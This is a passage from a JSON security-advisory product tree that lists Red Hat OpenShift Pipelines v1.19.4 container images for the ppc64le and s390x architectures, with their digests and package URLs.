"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-retention-policy-agent-rhel9@sha256%3A389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764775225"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-watcher-rhel9@sha256%3A13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764635259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-controller-rhel9@sha256%3Affbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769550"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-core-interceptors-rhel9@sha256%3Ac8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769552"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-eventlistenersink-rhel9@sha256%3Ac2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769677"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-webhook-rhel9@sha256%3A2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769674"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-console-plugin-rhel9@sha256%3Aa4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771718"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-manual-approval-gate-controller-rhel9@sha256%3Ac2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764777983"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-manual-approval-gate-webhook-rhel9@sha256%3A4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771736"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-cli-rhel9@sha256%3A63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830200"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-controller-rhel9@sha256%3A66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830290"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-watcher-rhel9@sha256%3A86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830107"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-webhook-rhel9@sha256%3A6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830289"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-cache-rhel9@sha256%3A3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771720"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-chains-controller-rhel9@sha256%3A5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771272"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-git-init-rhel9@sha256%3A4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764942761"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-api-rhel9@sha256%3A96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764818880"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-db-migration-rhel9@sha256%3A4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764819005"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-ui-rhel9@sha256%3Acdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764819019"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-controller-rhel9@sha256%3A1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845239"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-entrypoint-rhel9@sha256%3A068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845346"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-events-rhel9@sha256%3Afe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845294"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-nop-rhel9@sha256%3Ab6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845253"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-resolvers-rhel9@sha256%3A689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845383"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-sidecarlogresults-rhel9@sha256%3A4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845278"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-webhook-rhel9@sha256%3Ae5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845382"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-workingdirinit-rhel9@sha256%3Ab5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pruner-controller-rhel9@sha256%3A0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764774996"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-api-rhel9@sha256%3A63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764775225"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-retention-policy-agent-rhel9@sha256%3Ae8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764775225"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-watcher-rhel9@sha256%3A1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764635259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-controller-rhel9@sha256%3A2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769550"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-core-interceptors-rhel9@sha256%3A457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769552"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"product": {
